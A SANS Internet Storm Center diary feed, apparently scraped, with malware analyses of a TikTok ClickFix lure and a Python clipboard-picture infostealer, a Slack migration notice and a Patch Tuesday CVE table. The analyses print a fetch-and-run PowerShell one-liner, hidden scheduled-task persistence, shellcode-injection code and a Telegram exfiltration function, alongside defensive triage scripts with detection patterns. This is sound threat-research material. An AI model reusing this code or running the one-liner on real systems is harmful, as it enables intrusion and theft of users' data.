18 October 2025 - SANS Internet Storm Center, InfoCON: green

TikTok Videos Promoting Malware Installation, (Fri, Oct 17th)

Attackers are everywhere! They try to abuse victims using new communication channels and social engineering techniques! Somebody pointed me to the following TikTok video: hxxps://vm[.]tiktok[.]com/ZGdaCkbEF/.

The author claims to offer an easy way to activate Photoshop for free:

Note that the video has already been liked more than 500 times!

The technique is similar to the ClickFix[1] attack scenario. The victim is asked to start PowerShell as administrator and execute a one-liner:

iex (irm slmgr[.]win/photoshop)

When visiting this link, you get a piece of malicious PowerShell code that is executed immediately (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23). It has a VT score of 17/63[2]. Let's have a look at it!

It downloads the next stage from https://file-epq[.]pages[.]dev/updater.exe. Persistence is implemented through a scheduled task to execute it at logon time:

$tasknames = @('MicrosoftEdgeUpdateTaskMachineCore','GoogleUpdateTaskMachineCore','AdobeUpdateTask','OfficeBackgroundTaskHandlerRegistration','WindowsUpdateCheck')
$taskname = $tasknames[(Get-Random -Max 5)]
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -Command `"$scr`""
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -DontStopOnIdleEnd
Register-ScheduledTask -TaskName $taskname -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force -ErrorAction SilentlyContinue | Out-Null
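As an added example (not code from the diary), the following Python triages an exported Scheduled Task definition for the traits of this persistence: it reads the task XML that Task Scheduler stores under C:\Windows\System32\Tasks (the same document Export-ScheduledTask prints) and flags a vendor-lookalike name whose action is a hidden PowerShell download cradle rather than the vendor binary. The two task documents, the rule list and the function names are constructed for the example; the lookalike names are the ones in the snippet above.

```python
"""Triage Windows Scheduled Task XML for ClickFix-style persistence (added example).

Task Scheduler keeps one XML document per task under C:\\Windows\\System32\\Tasks,
and Export-ScheduledTask prints the same document. The rules below score the
traits of the task registered by the sample above: a vendor-lookalike name, a
hidden PowerShell action with -ExecutionPolicy Bypass and a download cradle,
an at-logon trigger and RunLevel HighestAvailable.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Task names the sample picks from at random to blend in with real updater tasks.
LOOKALIKE_NAMES = {
    "MicrosoftEdgeUpdateTaskMachineCore", "GoogleUpdateTaskMachineCore", "AdobeUpdateTask",
    "OfficeBackgroundTaskHandlerRegistration", "WindowsUpdateCheck",
}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SUSPICIOUS_ARGS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(xecutionpolicy)?\s+bypass", "ExecutionPolicy Bypass"),
    (r"\b(iex|invoke-expression)\b", "Invoke-Expression"),
    (r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", "download cradle"),
]

# Constructed sample 1: what the sample's Register-ScheduledTask call produces
# (XML declaration omitted; the URL is a placeholder, not the real stager).
MALICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleUpdateTaskMachineCore</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>admin</UserId>
    <LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command>
    <Arguments>-WindowStyle Hidden -ExecutionPolicy Bypass -Command "iex (irm hxxps://stager.invalid/p)"</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample 2: a benign updater task carrying the same name, for contrast.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleUpdateTaskMachineCore</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"</Command>
    <Arguments>/c</Arguments></Exec></Actions>
</Task>"""


def _text(root, path):
    """Text of the first element at `path` (namespaced), or '' when absent."""
    node = root.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def assess_task(xml_text):
    """Return {'name', 'score', 'reasons'} for one task XML document."""
    root = ET.fromstring(xml_text)
    name = _text(root, "t:RegistrationInfo/t:URI").rsplit("\\", 1)[-1]
    command = _text(root, "t:Actions/t:Exec/t:Command")
    args = _text(root, "t:Actions/t:Exec/t:Arguments")
    reasons = []
    # Basename of the executable, quotes stripped, so paths and bare names compare alike.
    exe = command.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()
    if exe in SCRIPT_HOSTS:
        reasons.append(f"action runs script host {exe}")
        for pattern, label in SUSPICIOUS_ARGS:
            if re.search(pattern, args, re.IGNORECASE):
                reasons.append(label)
        # A real updater task launches the vendor binary, never a script host.
        if name in LOOKALIKE_NAMES:
            reasons.append(f"lookalike name {name} with script-host action")
    if root.find("t:Triggers/t:LogonTrigger", NS) is not None:
        reasons.append("logon trigger")
    if _text(root, "t:Principals/t:Principal/t:RunLevel") == "HighestAvailable":
        reasons.append("RunLevel HighestAvailable")
    return {"name": name, "score": len(reasons), "reasons": reasons}


def is_persistence_suspect(result):
    """Suspect when a script host is the action and at least two other traits support it."""
    reasons = result["reasons"]
    return any(r.startswith("action runs script host") for r in reasons) and len(reasons) >= 3


if __name__ == "__main__":
    for doc in (MALICIOUS_TASK, BENIGN_TASK):
        r = assess_task(doc)
        print(r["name"], "SUSPECT" if is_persistence_suspect(r) else "ok", r["reasons"])
```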

Updater.exe (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8) is an AuraStealer[3] sample.

Finally, a second payload is downloaded and executed: source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)[4]. This one implements an interesting technique: it compiles code on demand during its execution:

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline"

This is something that I covered in previous diaries ("self-compiling malware")[5]. The compiled code is a class used to inject shellcode into memory:

using System;
using System.Runtime.InteropServices; 
public class SC { 
    [DllImport("kernel32.dll")] 
    public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p); 
    [DllImport("kernel32.dll")] 
    public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t); 
    [DllImport("kernel32.dll")] 
    public static extern uint WaitForSingleObject(IntPtr h, uint m); 
    public static void Run(byte[] sc) { 
      IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40); 
      Marshal.Copy(sc, 0, addr, sc.Length); 
      IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 
      WaitForSingleObject(t, 0xFFFFFFFF); 
    } 
}

While investigating this piece of malware, I discovered more videos from the same campaign, using other software names as the lure:

  • hxxps://vm[.]tiktok[.]com/ZGdaC7EQY/
  • hxxps://vm[.]tiktok[.]com/ZGdaX8jVq/

Stay safe and don't trust such videos!

[1] https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
[2] https://www.virustotal.com/gui/file/6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.aurastealer
[4] https://www.virustotal.com/gui/file/db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
[5] https://isc.sans.edu/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New DShield Support Slack, (Thu, Oct 16th)

This week, we set up a new Slack workspace for DShield.org. This workspace replaces the old workspace we originally configured back in 2016 or 2017. The workspace was originally configured as a free workspace to support the DShield.org community. Over the years, it has had a good following and a good amount of traffic.

Sadly, we learned that none of the "S" in SaaS stands for security or privacy. A couple of years ago, the SANS Institute decided to purchase an enterprise license for its Slack workspace. The details have been lost to time and to a complete turnover of contacts at Slack and now Salesforce. But our DShield.org workspace ended up as part of the Enterprise account, leading to an inflated subscription fee for SANS. As "Owner" of the DShield.org Slack, I was never asked to have the DShield.org Slack merged with the SANS account. As far as I can tell, nobody from SANS asked for it. This was not the only Slack affected. Several smaller Slack workspaces created by SANS instructors for their personal use were merged as well.

Salesforce, the current owner of the Slack brand, offered two options: Keep paying for the Slack workspace (several $ per month per user) or create a new workspace. They repeatedly denied that there is any other option. SANS did consult with me about how to move forward, and I did interact with several contacts at Salesforce to attempt to verify what exactly happened. But none of the Salesforce contacts were familiar with what exactly happened in part due to high turnover. I got various conflicting answers, but they remained consistent in being unable to "undo" the switch that turned the DShield.org workspace into an enterprise account.

SANS did offer to pay the inflated fee, but I do not think it is right to just roll over and pay. Instead, I started a new Slack this week. You can find it here:

https://join.slack.com/t/dshieldorgsup-kp41959/shared_invite/zt-3fmshiz9v-KwX2Vmgc3jdkrMDl8sWTNQ

Why did we not just move to another solution? There are various free community communication solutions. We have used several over the last 25 years: IRC and Jabber come to mind. Currently, Discord is a strong contender. Others suggested Telegram, Mattermost, Signal, WhatsApp, and Matrix. I did a quick poll on the old Slack, and Slack won as an option. I know, there is some bias here among existing Slack users. But one goal is not to lose existing community members. Personally, I also try to limit the number of chat clients I am running. Maybe we should go back to IRC or Silk :) 

So for now, we will stick with Slack, cross our fingers, and hope things work out with the new workspace. Existing members of the old Slack should have received an email with the new invite link. I will also do a mass invite in the new Slack later today for existing "old workspace members".

The old workspace will be deleted this Monday.

--
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


Clipboard Pictures Exfiltration in Python Infostealer, (Wed, Oct 15th)

For a while, clipboard content has been monitored by many infostealers. The purposes vary, from simply searching and exfiltrating juicy data to on-the-fly modification such as crypto-wallet address swapping[1]. Note that the clipboard is a major risk when you don't disable clipboard sharing between your virtual machines and the host. Malware running in a sandbox can read your (host) clipboard without any problem!

The clipboard does not only carry text. Today, we use the clipboard to move a lot of "binary data" around. After plain text, the most common data type is pictures! We take pictures all the time and share them through the clipboard! Who has never grabbed a piece of the screen like this? It is convenient when writing reports or documentation, or for archiving purposes.

I spotted a Python infostealer that pays attention to pictures exchanged through the clipboard. It's pretty easy to implement because the ImageGrab module of the Pillow library has this feature built in[2]. Here is the piece of code implemented in the malware:

import io
import hashlib
from PIL import Image, ImageGrab

prev_clip_img_hash = None  # hash of the last picture sent; kept across iterations of the sample's loop

img = ImageGrab.grabclipboard()          # an Image when a picture is on the clipboard, otherwise a file list or None
if isinstance(img, Image.Image):
    img_bytes = io.BytesIO()
    img.save(img_bytes, format='PNG')
    img_hash = hashlib.md5(img_bytes.getvalue()).hexdigest()
    if img_hash != prev_clip_img_hash:   # only exfiltrate a given picture once
        img_path = "clipboard_img.png"
        img.save(img_path, "PNG")
        send_image(img_path)
        prev_clip_img_hash = img_hash

Telegram is used for C2 communications:

import os
import logging
import requests

# TOKEN (the bot token), CHAT_ID and bot_active are defined elsewhere in the sample.
def send_image(image_path):
    if not bot_active or not os.path.exists(image_path):
        logging.warning(f"[send_image] Tệp không tồn tại: {image_path}")
        return
    try:
        with open(image_path, "rb") as photo:
            # Telegram Bot API: upload the PNG as a document to the attacker-controlled chat
            url = f"https://api.telegram.org/bot{TOKEN}/sendDocument"
            files = {"document": photo}
            data = {"chat_id": CHAT_ID}
            response = requests.post(url, files=files, data=data)
            if response.status_code != 200:
                logging.error(f"[send_image] Lỗi gửi ảnh: {response.text}")
    except Exception as e:
        logging.error(f"[send_image] Gửi ảnh lỗi: {e}")

Note the presence of Vietnamese text ("Tệp không tồn tại" means "File not found"). The file (SHA256: 7c70f53ff1e05ee104403784f42819adb1e445c9d97b82cff72a986d59619959) has a low VT score (5/64)[3].
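As an added example (not the malware's code and not part of the diary), here is a small static triage script for Python samples like this one: it parses a source file with the ast module and looks for the combination the snippets above exhibit, a grabclipboard() call, a hash-based dedupe, an upload via requests.post(files=...) and a Telegram Bot API URL (including inside f-strings). The condensed SAMPLE_SOURCE and all function names are constructed for the example.

```python
"""Static triage for Python clipboard-image stealers (added example, not the sample's code).

The heuristics are taken from the snippet discussed above: PIL.ImageGrab.grabclipboard()
feeding a PNG into a hashed dedupe loop, and a Telegram Bot API sendDocument upload.
"""
import ast
from dataclasses import dataclass, field

# Constructed sample: a condensed stand-in for the stealer's source, used only as test input.
SAMPLE_SOURCE = '''
import io, hashlib, os, requests
from PIL import Image, ImageGrab
TOKEN = "123456:PLACEHOLDER_NOT_A_REAL_TOKEN"
CHAT_ID = "0000"
prev = None
def send_image(path):
    with open(path, "rb") as photo:
        url = f"https://api.telegram.org/bot{TOKEN}/sendDocument"
        requests.post(url, files={"document": photo}, data={"chat_id": CHAT_ID})
while True:
    img = ImageGrab.grabclipboard()
    if isinstance(img, Image.Image):
        buf = io.BytesIO(); img.save(buf, format="PNG")
        h = hashlib.md5(buf.getvalue()).hexdigest()
        if h != prev:
            img.save("clipboard_img.png", "PNG"); send_image("clipboard_img.png"); prev = h
'''


@dataclass
class Findings:
    clipboard_grab: bool = False    # ImageGrab.grabclipboard() is called
    telegram_bot_api: bool = False  # a string literal points at api.telegram.org/bot...
    upload_call: bool = False       # requests.post/put(..., files=...) multipart upload
    hashing: bool = False           # hashlib digest (dedupe of already-sent pictures)
    hits: list = field(default_factory=list)

    def score(self) -> int:
        return sum([self.clipboard_grab, self.telegram_bot_api, self.upload_call, self.hashing])


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage(source: str) -> Findings:
    """Walk the AST of `source` and record the traits of the clipboard stealer."""
    f = Findings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func) or ""
            if name.endswith("grabclipboard"):
                f.clipboard_grab = True
                f.hits.append(f"line {node.lineno}: {name}()")
            elif name in ("requests.post", "requests.put") and any(k.arg == "files" for k in node.keywords):
                f.upload_call = True
                f.hits.append(f"line {node.lineno}: {name}(files=...)")
            elif name.startswith("hashlib."):
                f.hashing = True
        # Constant parts of f-strings are separate Constant nodes, so the bot URL
        # is found even when the token is interpolated into it.
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and "api.telegram.org/bot" in node.value:
            f.telegram_bot_api = True
            f.hits.append(f"line {node.lineno}: Telegram Bot API URL")
    return f


def is_suspicious(f: Findings) -> bool:
    """Clipboard grabbing alone is what screenshot tools do; pair it with an exfil channel."""
    return f.clipboard_grab and (f.telegram_bot_api or f.upload_call)


if __name__ == "__main__":
    result = triage(SAMPLE_SOURCE)
    print("score", result.score(), "suspicious", is_suspicious(result))
    for hit in result.hits:
        print(" ", hit)
```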

[1] https://isc.sans.edu/diary/MultiCryptocurrency+Clipboard+Swapper/28574
[2] https://pillow.readthedocs.io/en/stable/reference/ImageGrab.html#PIL.ImageGrab.grabclipboard
[3] https://www.virustotal.com/gui/file/7c70f53ff1e05ee104403784f42819adb1e445c9d97b82cff72a986d59619959/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant


Microsoft Patch Tuesday October 2025, (Tue, Oct 14th)

I am experimenting today with a little bit of a cleaned-up patch overview. I removed vulnerabilities that affect Microsoft's cloud systems (but appreciate Microsoft listing them at all), as well as vulnerabilities in third-party software like open source libraries. This should leave us with Microsoft-specific on-premises vulnerabilities. This month, this leaves 157 different vulnerabilities. Eight of the vulnerabilities are rated critical.

This month, Microsoft is discontinuing support for a number of different products:

  • Windows 10
  • Office 2016
  • Exchange Server 2016
  • Office 2019
  • Exchange Server 2019

Office and Exchange users are directed towards cloud and subscription offerings. For Office, you still have Office 2024 available if you would rather "own" the product. For Exchange, the Exchange Server Subscription Edition is available as of July.

Windows 10 users will have the option to sign up for "Extended Security Updates" (ESU). It has been offered as a low-cost alternative to retain security updates, and in some countries, it is offered for free.

Description
CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
.NET Elevation of Privilege Vulnerability
%%cve:2025-55247%% No No - - Important 7.3 6.4
.NET, .NET Framework, and Visual Studio Information Disclosure Vulnerability
%%cve:2025-55248%% No No - - Important 4.8 4.2
ASP.NET Security Feature Bypass Vulnerability
%%cve:2025-55315%% No No - - Important 9.9 8.6
Configuration Manager Elevation of Privilege Vulnerability
%%cve:2025-55320%% No No - - Important 6.7 5.8
%%cve:2025-59213%% No No - - Important 8.4 7.3
Copilot Spoofing Vulnerability
%%cve:2025-59272%% No No - - Critical 6.5 5.7
%%cve:2025-59286%% No No - - Critical 6.5 5.7
Data Sharing Service Spoofing Vulnerability
%%cve:2025-59200%% No No - - Important 7.7 6.7
Desktop Windows Manager Elevation of Privilege Vulnerability
%%cve:2025-55681%% No No - - Important 7.0 6.1
DirectX Graphics Kernel Denial of Service Vulnerability
%%cve:2025-55698%% No No - - Important 7.7 6.7
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2025-55678%% No No - - Important 7.0 6.1
Internet Information Services (IIS) Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability
%%cve:2025-59282%% No No - - Important 7.0 6.1
JDBC Driver for SQL Server Spoofing Vulnerability
%%cve:2025-59250%% No No - - Important 8.1 7.1
M365 Copilot Spoofing Vulnerability
%%cve:2025-59252%% No No - - Critical 6.5 5.7
MITRE CVE-2025-54957: Integer overflow in Dolby Digital Plus audio decoder
%%cve:2025-54957%% No No - - Important 7.0 6.1
MITRE: CVE-2025-59489 Unity Gaming Engine Editor vulnerability
%%cve:2025-59489%% No No - - Important 8.4 8.4
Microsoft Brokering File System Elevation of Privilege Vulnerability
%%cve:2025-48004%% No No - - Important 7.4 6.4
%%cve:2025-59189%% No No - - Important 7.4 6.4
Microsoft DWM Core Library Elevation of Privilege Vulnerability
%%cve:2025-58722%% No No - - Important 7.8 6.8
%%cve:2025-59254%% No No - - Important 7.8 6.8
Microsoft Defender for Linux Denial of Service Vulnerability
%%cve:2025-59497%% No No - - Important 7.0 6.1
Microsoft Excel Information Disclosure Vulnerability
%%cve:2025-59235%% No No - - Important 7.1 6.2
%%cve:2025-59232%% No No - - Important 7.1 6.2
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2025-59231%% No No - - Important 7.8 6.8
%%cve:2025-59233%% No No - - Important 7.8 6.8
%%cve:2025-59236%% No No - - Critical 8.4 7.3
%%cve:2025-59243%% No No - - Important 7.8 6.8
%%cve:2025-59223%% No No - - Important 7.8 6.8
%%cve:2025-59224%% No No - - Important 7.8 6.8
%%cve:2025-59225%% No No - - Important 7.8 6.8
Microsoft Exchange Server Elevation of Privilege Vulnerability
%%cve:2025-53782%% No No - - Important 8.4 7.3
%%cve:2025-59249%% No No - - Important 8.8 7.7
Microsoft Exchange Server Spoofing Vulnerability
%%cve:2025-59248%% No No - - Important 7.5 6.5
Microsoft Failover Cluster Information Disclosure Vulnerability
%%cve:2025-47979%% No No - - Important 5.5 4.8
%%cve:2025-59188%% No No - - Important 5.5 4.8
Microsoft Failover Cluster Virtual Driver Information Disclosure Vulnerability
%%cve:2025-59260%% No No - - Important 5.5 4.8
Microsoft Graphics Component Denial of Service Vulnerability
%%cve:2025-59195%% No No - - Important 7.0 6.1
Microsoft Graphics Component Elevation of Privilege Vulnerability
%%cve:2025-49708%% No No - - Critical 9.9 8.6
Microsoft Office Denial of Service Vulnerability
%%cve:2025-59229%% No No - - Important 5.5 4.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2025-59234%% No No - - Critical 7.8 6.8
%%cve:2025-59227%% No No - - Critical 7.8 6.8
Microsoft Office Visio Remote Code Execution Vulnerability
%%cve:2025-59226%% No No - - Important 7.8 6.8
Microsoft PowerPoint Remote Code Execution Vulnerability
%%cve:2025-59238%% No No - - Important 7.8 6.8
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2025-59228%% No No - - Important 8.8 7.7
%%cve:2025-59237%% No No - - Important 8.8 7.7
Microsoft Windows File Explorer Spoofing Vulnerability
%%cve:2025-58739%% No No - - Important 6.5 5.7
%%cve:2025-59214%% No No - - Important 6.5 5.7
Microsoft Word Remote Code Execution Vulnerability
%%cve:2025-59221%% No No - - Important 7.0 6.1
%%cve:2025-59222%% No No - - Important 7.8 6.8
NTLM Hash Disclosure Spoofing Vulnerability
%%cve:2025-59185%% No No - - Important 6.5 5.7
%%cve:2025-59244%% No No - - Important 6.5 5.7
Network Connection Status Indicator (NCSI) Elevation of Privilege Vulnerability
%%cve:2025-59201%% No No - - Important 7.8 6.8
NtQueryInformation Token function (ntifs.h) Elevation of Privilege Vulnerability
%%cve:2025-55696%% No No - - Important 7.8 6.8
Playwright Spoofing Vulnerability
%%cve:2025-59288%% No No - - Moderate 5.3 4.9
PowerShell Elevation of Privilege Vulnerability
%%cve:2025-25004%% No No - - Important 7.3 6.4
Remote Desktop Client Remote Code Execution Vulnerability
%%cve:2025-58718%% No No - - Important 8.8 7.7
Remote Desktop Protocol Remote Code Execution Vulnerability
%%cve:2025-58737%% No No - - Important 7.0 6.1
Remote Procedure Call Denial of Service Vulnerability
%%cve:2025-59502%% No No - - Moderate 7.5 6.5
Software Protection Platform (SPP) Elevation of Privilege Vulnerability
%%cve:2025-59199%% No No - - Important 7.8 6.8
Storage Spaces Direct Information Disclosure Vulnerability
%%cve:2025-59184%% No No - - Important 5.5 4.8
Storport.sys Driver Elevation of Privilege Vulnerability
%%cve:2025-59192%% No No - - Important 7.8 6.8
Virtual Secure Mode Spoofing Vulnerability
%%cve:2025-48813%% No No - - Important 6.3 5.5
Visual Studio Elevation of Privilege Vulnerability
%%cve:2025-55240%% No No - - Important 7.3 6.4
Windows Active Directory Federation Services (ADFS) Information Disclosure Vulnerability
%%cve:2025-59258%% No No - - Important 6.2 5.4
Windows Agere Modem Driver Elevation of Privilege Vulnerability
%%cve:2025-24990%% No Yes - - Important 7.8 7.2
%%cve:2025-24052%% Yes No - - Important 7.8 7.0
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
%%cve:2025-59242%% No No - - Important 7.8 6.8
%%cve:2025-58714%% No No - - Important 7.8 6.8
Windows Authentication Elevation of Privilege Vulnerability
%%cve:2025-55701%% No No - - Important 7.8 6.8
%%cve:2025-59277%% No No - - Important 7.8 6.8
%%cve:2025-59275%% No No - - Important 7.8 6.8
%%cve:2025-59278%% No No - - Important 7.8 6.8
Windows BitLocker Security Feature Bypass Vulnerability
%%cve:2025-55333%% No No - - Important 6.1 5.3
%%cve:2025-55338%% No No - - Important 6.1 5.3
%%cve:2025-55330%% No No - - Important 6.1 5.3
%%cve:2025-55332%% No No - - Important 6.1 5.3
%%cve:2025-55337%% No No - - Important 6.1 5.3
%%cve:2025-55682%% No No - - Important 6.1 5.3
Windows Bluetooth Service Elevation of Privilege Vulnerability
%%cve:2025-58728%% No No - - Important 7.8 6.8
%%cve:2025-59290%% No No - - Important 7.8 6.8
%%cve:2025-59289%% No No - - Important 7.0 6.1
Windows COM+ Event System Service Elevation of Privilege Vulnerability
%%cve:2025-58725%% No No - - Important 7.0 6.1
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
%%cve:2025-55680%% No No - - Important 7.8 6.8
Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
%%cve:2025-55336%% No No - - Important 5.5 4.8
Windows Connected Devices Platform Service (Cdpsvc) Remote Code Execution Vulnerability
%%cve:2025-55326%% No No - - Important 7.5 6.5
Windows Connected Devices Platform Service Elevation of Privilege Vulnerability
%%cve:2025-58719%% No No - - Important 4.7 4.1
%%cve:2025-58727%% No No - - Important 7.0 6.1
%%cve:2025-59191%% No No - - Important 7.8 6.8
Windows Cryptographic Services Information Disclosure Vulnerability
%%cve:2025-58720%% No No - - Important 7.8 6.8
Windows DWM Core Library Elevation of Privilege Vulnerability
%%cve:2025-59255%% No No - - Important 7.8 6.8
Windows Device Association Broker Service Elevation of Privilege Vulnerability
%%cve:2025-50174%% No No - - Important 7.0 6.1
%%cve:2025-55677%% No No - - Important 7.8 6.8
Windows Digital Media Elevation of Privilege Vulnerability
%%cve:2025-53150%% No No - - Important 7.8 6.8
%%cve:2025-50175%% No No - - Important 7.8 6.8
Windows ETL Channel Information Disclosure Vulnerability
%%cve:2025-59197%% No No - - Important 5.5 4.8
Windows Error Reporting Service Elevation of Privilege Vulnerability
%%cve:2025-55692%% No No - - Important 7.8 6.8
%%cve:2025-55694%% No No - - Important 7.8 6.8
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2025-59205%% No No - - Important 7.0 6.1
%%cve:2025-59261%% No No - - Important 7.0 6.1
Windows Health and Optimized Experiences Elevation of Privilege Vulnerability
%%cve:2025-59241%% No No - - Important 7.8 6.8
Windows Hello Security Feature Bypass Vulnerability
%%cve:2025-53139%% No No - - Important 7.7 6.7
Windows Hyper-V Elevation of Privilege Vulnerability
%%cve:2025-55328%% No No - - Important 7.8 6.8
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2025-59207%% No No - - Important 7.8 6.8
%%cve:2025-50152%% No No - - Important 7.8 6.8
%%cve:2025-55693%% No No - - Important 7.4 6.4
%%cve:2025-59187%% No No - - Important 7.8 6.8
%%cve:2025-59194%% No No - - Important 7.0 6.1
Windows Kernel Information Disclosure Vulnerability
%%cve:2025-59186%% No No - - Important 5.5 4.8
%%cve:2025-55679%% No No - - Important 5.1 4.5
%%cve:2025-55683%% No No - - Important 5.5 4.8
%%cve:2025-55699%% No No - - Important 5.5 4.8
Windows Kernel Security Feature Bypass Vulnerability
%%cve:2025-55334%% No No - - Important 6.2 5.4
Windows Local Session Manager (LSM) Denial of Service Vulnerability
%%cve:2025-59257%% No No - - Important 6.5 5.7
%%cve:2025-59259%% No No - - Important 6.5 5.7
%%cve:2025-58729%% No No - - Important 6.5 5.7
Windows Management Services Elevation of Privilege Vulnerability
%%cve:2025-59193%% No No - - Important 7.0 6.1
Windows Management Services Information Disclosure Vulnerability
%%cve:2025-59204%% No No - - Important 5.5 4.8
Windows MapUrlToZone Information Disclosure Vulnerability
%%cve:2025-59208%% No No - - Important 7.1 6.2
Windows NTFS Elevation of Privilege Vulnerability
%%cve:2025-55335%% No No - - Important 7.4 6.4
Windows NTLM Spoofing Vulnerability
%%cve:2025-59284%% No No - - Important 3.3 2.9
Windows Network Driver Interface Specification Driver Elevation of Privilege Vulnerability
%%cve:2025-55339%% No No - - Important 7.8 6.8
Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability
%%cve:2025-55685%% No No - - Important 7.0 6.1
%%cve:2025-55686%% No No - - Important 7.0 6.1
%%cve:2025-55689%% No No - - Important 7.0 6.1
%%cve:2025-55331%% No No - - Important 7.0 6.1
%%cve:2025-55684%% No No - - Important 7.0 6.1
%%cve:2025-55688%% No No - - Important 7.0 6.1
%%cve:2025-55690%% No No - - Important 7.0 6.1
%%cve:2025-55691%% No No - - Important 7.0 6.1
Windows Push Notification Information Disclosure Vulnerability
%%cve:2025-59211%% No No - - Important 5.5 4.8
%%cve:2025-59209%% No No - - Important 5.5 4.8
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
%%cve:2025-59230%% No Yes - - Important 7.8 7.2
Windows Remote Desktop Protocol Security Feature Bypass
%%cve:2025-55340%% No No - - Important 7.0 6.1
Windows Remote Desktop Services Elevation of Privilege Vulnerability
%%cve:2025-59202%% No No - - Important 7.0 6.1
Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability
%%cve:2025-59206%% No No - - Important 7.4 6.4
%%cve:2025-59210%% No No - - Important 7.4 6.4
Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
%%cve:2025-55687%% No No - - Important 7.4 6.4
Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
%%cve:2025-55700%% No No - - Important 6.5 5.7
%%cve:2025-58717%% No No - - Important 6.5 5.7
Windows SMB Client Tampering Vulnerability
%%cve:2025-59280%% No No - - Important 3.1 2.7
Windows SMB Server Elevation of Privilege Vulnerability
%%cve:2025-58726%% No No - - Important 7.5 6.5
Windows Search Service Denial of Service Vulnerability
%%cve:2025-59190%% No No - - Important 5.5 4.8
%%cve:2025-59198%% No No - - Important 5.0 4.4
%%cve:2025-59253%% No No - - Important 5.5 4.8
Windows Server Update Service (WSUS) Remote Code Execution Vulnerability
%%cve:2025-59287%% No No - - Critical 9.8 8.5
Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability
%%cve:2025-59196%% No No - - Important 7.0 6.1
Windows Speech Runtime Elevation of Privilege Vulnerability
%%cve:2025-58715%% No No - - Important 8.8 7.7
%%cve:2025-58716%% No No - - Important 8.8 7.7
Windows State Repository API Server File Information Disclosure Vulnerability
%%cve:2025-59203%% No No - - Important 5.5 4.8
